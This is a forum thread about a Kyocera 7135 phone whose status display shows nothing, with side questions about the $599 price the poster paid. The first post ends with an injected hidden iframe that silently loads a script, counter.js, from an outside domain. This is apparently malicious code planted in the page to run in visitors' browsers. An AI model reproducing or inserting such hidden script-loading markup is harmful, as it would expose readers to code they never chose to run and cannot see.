+ Reply to Thread

Help! Numeric display unlit on new phone.

I just purchased three more 7135's, ($599 each by the way), and one of them is not displaying the numeric/status display on the top of the phone. Any ideas? I've run through all the settings....perhaps I'm missing something. Help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

If you're talking about the numeric caller ID number, if your dispay just indicates "Incoming Call", you have the caller ID problem that I and MANY others have (particularly in the NYC area). The numeric display will come up from time to time, but not all the time. You should review the "Caller ID" thread.

Re: Help! Numeric display unlit on new phone.

Originally posted by Paradigm Shift
    I just purchased three more 7135's, ($599 each by the way), and one of them is not displaying the numeric/status display on the top of the phone. Any ideas? I've run through all the settings....perhaps I'm missing something. Help.
    599 without contract? How'd you pull that?

Yeah, seriously, where & how did you get them for $599?
    ~'kito
    pdaPhoneHome Moderator

The numeric display shows nothing....not even signal strength or battery level. The window is simply blank. For the life of me I can't figure out what the problem is. I am NOT referring to caller ID.

As far as the cost $599, I simply walked in and bought them, nothing special about that. I have purchase four of them now for the same price.

Originally posted by Paradigm Shift
    As far as the cost $599, I simply walked in and bought them, nothing special about that. I have purchase four of them now for the same price.
    I assume that the price is with the Alltel service. If not, where did you walk in an buy them?